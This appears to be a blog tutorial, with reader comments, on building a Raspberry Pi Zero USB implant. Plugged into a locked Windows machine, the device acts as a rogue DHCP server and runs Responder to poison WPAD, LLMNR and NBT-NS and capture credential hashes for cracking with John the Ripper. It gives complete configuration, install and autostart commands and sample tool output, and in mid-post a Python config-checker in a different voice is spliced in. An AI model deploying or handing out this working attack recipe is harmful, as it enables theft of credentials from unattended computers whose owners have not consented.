So this is not all my own original work. This is a bringing together of the Ethernet gadget tutorial by Lady Ada at Adafruit and the beautiful work by Mubix at room362, which uses Laurent Gaffie's Responder.py scripts from SpiderLabs.
I'm still using Mubix's recipe of USB Ethernet + DHCP + Responder == Creds, but here we are using a £4.00 Raspberry Pi Zero instead of the USB Armory or the Hak5 LAN Turtle. Both are awesome products.
Please note that this only works on the RPi Zero. Other RPis will not work!
1.0 Setup the RPi Zero for Ethernet over USB
Download and install the latest Jessie Lite from here onto an SD Card.
Pop the card out of the card reader and re-insert it to mount it. Take your favorite text editor and edit the following two files in the boot partition.
config.txt
Go to the bottom and add dtoverlay=dwc2 as the last line.
Save the config.txt file.
cmdline.txt
After rootwait (the last word on the first line) add a space and then modules-load=dwc2,g_ether.
Save the cmdline.txt file.
Eject the SD card and pop it in your RPi Zero.
Your RPi is now set up to be recognised as an Ethernet over USB device, but we have unconfigured network interfaces at both ends, so you probably won't be able to do much with it just yet.
Let's boot up the RPi Zero and connect it to the internet to install a DHCP server and grab the responder scripts while we are at it.
2.0 Preparing the RPi for Attack
For this section I connected my RPi to my Ethernet switch using the OTG cable and a USB to Ethernet converter and SSHed to it. You could use a wireless dongle instead.
I'm not using the newly created usb0 interface until we are ready to deploy.
Sure, you could share the internet from your PC with the RPi over your newly created usb0 interface, but that's a whole load of configuration with routes and iptables that we would then need to undo when we want to deploy the RPi.
2.1 Installing DHCP service
We are going to create a static IP address on usb0 and install dnsmasq as our DHCP server.
Create a static config for usb0
Using your favorite linux editor edit /etc/network/interfaces
sudo vi /etc/network/interfaces
Find the usb0 section or create it to match the following:
allow-hotplug usb0
iface usb0 inet static
address 192.168.200.1
netmask 255.255.255.0
Of course you can configure whatever IP address and network you want in here; just make sure that it is consistent with the details that you configure in the DHCP server.
Install dnsmasq
We are using dnsmasq as our DHCP server which we will also use to point clients to the responder.py for poisoning.
sudo apt-get install dnsmasq
Edit /etc/dnsmasq.conf
Throw away the default configuration and use the following:
interface=usb0
dhcp-range=192.168.200.2,192.168.200.254,255.255.255.0,1h
dhcp-authoritative
dhcp-option=252,http://192.168.200.1/wpad.dat
log-queries
log-dhcp
port=0
Note that the IP addresses have to be consistent with the static IP address you configured on the usb0 interface. The important part for the wpad.dat attack is dhcp-option 252, which points at the IP address of the Pi so that the Responder script can serve the proxy configuration to the client.
Also notice that port=0 configures dnsmasq not to act as a DNS server, as we want Responder to be the poisoning DNS server.
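The consistency rules in the two notes above (the DHCP range and WPAD URL must match the usb0 address and netmask, and port=0 must be set so dnsmasq stays out of DNS) are easy to get wrong when editing by hand. The following is an added example, not part of the original post or of dnsmasq, that checks a dnsmasq.conf against the usb0 stanza in /etc/network/interfaces. The two config texts are embedded as constructed copies of the fragments above so it runs offline; the function names are my own.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Constructed copies of the two config fragments from this post, embedded so
# the checker runs offline. On a real Pi you would read the files instead.
INTERFACES = """\
allow-hotplug usb0
iface usb0 inet static
address 192.168.200.1
netmask 255.255.255.0
"""

DNSMASQ_CONF = """\
interface=usb0
dhcp-range=192.168.200.2,192.168.200.254,255.255.255.0,1h
dhcp-authoritative
dhcp-option=252,http://192.168.200.1/wpad.dat
log-queries
log-dhcp
port=0
"""


def parse_iface(text, name):
    """Return (address, netmask) from the 'iface <name> inet static' stanza."""
    addr = mask = None
    in_stanza = False
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        if parts[0] == "iface":
            in_stanza = len(parts) >= 2 and parts[1] == name
        elif in_stanza and parts[0] == "address":
            addr = parts[1]
        elif in_stanza and parts[0] == "netmask":
            mask = parts[1]
    return addr, mask


def parse_dnsmasq(text):
    """Return option -> list of values (dnsmasq options may repeat)."""
    opts = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and blanks
        if not line:
            continue
        key, _, value = line.partition("=")
        opts.setdefault(key.strip(), []).append(value.strip())
    return opts


def check_consistency(interfaces_text, dnsmasq_text, iface="usb0"):
    """Return a list of problems; an empty list means the two configs agree."""
    problems = []
    addr, mask = parse_iface(interfaces_text, iface)
    if addr is None or mask is None:
        return [f"no static address/netmask for {iface} in interfaces"]
    pi = ipaddress.ip_interface(f"{addr}/{mask}")
    net = pi.network
    opts = parse_dnsmasq(dnsmasq_text)

    if iface not in opts.get("interface", []):
        problems.append(f"dnsmasq is not bound to {iface}")

    if "dhcp-range" not in opts:
        problems.append("no dhcp-range configured")
    for rng in opts.get("dhcp-range", []):
        fields = [f.strip() for f in rng.split(",")]
        if len(fields) < 2:
            problems.append(f"malformed dhcp-range: {rng}")
            continue
        start = ipaddress.ip_address(fields[0])
        end = ipaddress.ip_address(fields[1])
        if start not in net or end not in net:
            problems.append(f"dhcp-range {start}-{end} lies outside {net}")
        if start <= pi.ip <= end:
            problems.append(f"dhcp-range includes the Pi's own address {pi.ip}")
        # Third field is an optional netmask (the fourth is the lease time).
        if len(fields) >= 3 and re.match(r"\d+\.\d+\.\d+\.\d+$", fields[2]) and fields[2] != mask:
            problems.append(f"dhcp-range netmask {fields[2]} differs from {iface} netmask {mask}")

    wpad = [v for v in opts.get("dhcp-option", []) if v.startswith("252,")]
    if not wpad:
        problems.append("no dhcp-option 252 (WPAD URL) configured")
    for v in wpad:
        host = urlparse(v.split(",", 1)[1]).hostname
        if host != str(pi.ip):
            problems.append(f"WPAD URL host {host} is not the {iface} address {pi.ip}")

    # Without port=0 dnsmasq answers DNS itself on port 53.
    if opts.get("port", ["53"])[-1] != "0":
        problems.append("port is not 0, dnsmasq will answer DNS itself")
    return problems


if __name__ == "__main__":
    for problem in check_consistency(INTERFACES, DNSMASQ_CONF) or ["configs are consistent"]:
        print(problem)
```

Run it with the two file contents read from disk and act on any line it prints; a change to the usb0 address that is not mirrored in the WPAD URL or the DHCP range is reported as a specific mismatch rather than discovered on the target.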
2.2 Installing Responder
The following downloads Responder.py and installs the necessary dependencies:
sudo su -
apt-get install -y python git python-pip python-dev screen sqlite3 inotify-tools
pip install pycrypto
git clone https://github.com/spiderlabs/responder
The Responder script currently detects whether the Responder.db file exists and creates it if not; if Responder.db is an empty file it doesn't create the tables. The easiest way to deal with this is to delete the file /root/responder/Responder.db and allow the script to recreate it correctly.
rm /root/responder/Responder.db
2.3 Putting it all together
To get Responder to start up when the RPi boots and shut down once creds have been obtained, add the following to /etc/rc.local:
# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python Responder.py -I usb0 -f -w -r -d -F'
# Shutdown once creds have been obtained
/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /root/responder/Responder.db; do shutdown -h now; done'
exit 0
The inotifywait loop checks whether Responder.db has been modified and then shuts down the Pi. Because we are letting Responder create the Responder.db file, this won't work the first time we deploy the RPi.
To see what the commands are doing you can use screen to watch what is going on:
screen -r responder
NBT Name Service/LLMNR Answerer 1.0.
Please send bugs/comments to: [email protected]
To kill this script hit CRTL-C
[+]NBT-NS & LLMNR responder started
Global Parameters set:
Challenge set is: 1122334455667788
WPAD Proxy Server is:ON
HTTP Server is:ON
HTTPS Server is:ON
SMB Server is:ON
SMB LM support is set to:0
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:OFF
You can manually check the contents of the sqlite database with the command:
sqlite3 /root/responder/Responder.db 'select * from responder'
However the log files under /root/responder/logs contain a file that is perfectly formatted for cracking with John the Ripper Jumbo.
./john logfile.txt
This will take some time...
3.0 Deploying the RPi Zero
Just plug the RPi Zero into the target machine using a standard micro USB cable in the USB connector. No separate power is needed; the RPi is powered via the USB port, like so:
Give the RPi about 20 seconds to boot up, then wait. If you watch the screen on the target Windows PC you will see the Ethernet gadget install, and then within about 10 seconds you will see the PC trying to configure the proxy. All being well, the RPi should detect the update to Responder.db and shut itself down. Unplug the RPi.
This works regardless of whether the screen is locked or not, allowing us to snag the network hashes.
On domain-joined PCs, Windows NLA may kick in, detect a new network and stop the wpad.dat attack from working; however, leaving the RPi plugged in for a short while will provide a wealth of details about the network for further analysis.
I've had pretty good success with this on various Windows machines; however, I've found that this doesn't work well on VMs, perhaps something to do with the Ethernet gadget drivers.
I'm also looking for better ways to target domain-joined PCs to stop the network detection kicking in and preventing this from working. Let me know if you have any ideas!
Hi, is this solution still working (on your side)? I was not able to get any Responder.db or any DB entries. I tried the old Responder version (from here) as well as the new one: https://github.com/lgandx/Responder
I also tried this how-to: http://elevatedprompt.com/2016/09/snagging-credentials-from-locked-machines-with-raspberry-pi-zero/#comment-285
Cheers
Andre
Absolutely it is still working. Have you tried running it on an unlocked machine to see what the machine does?
Hi, I want to make this run on a Raspberry Pi 3. Do you think it is possible?
If possible, what do you think I need to change in this tutorial?
Cheers
Cris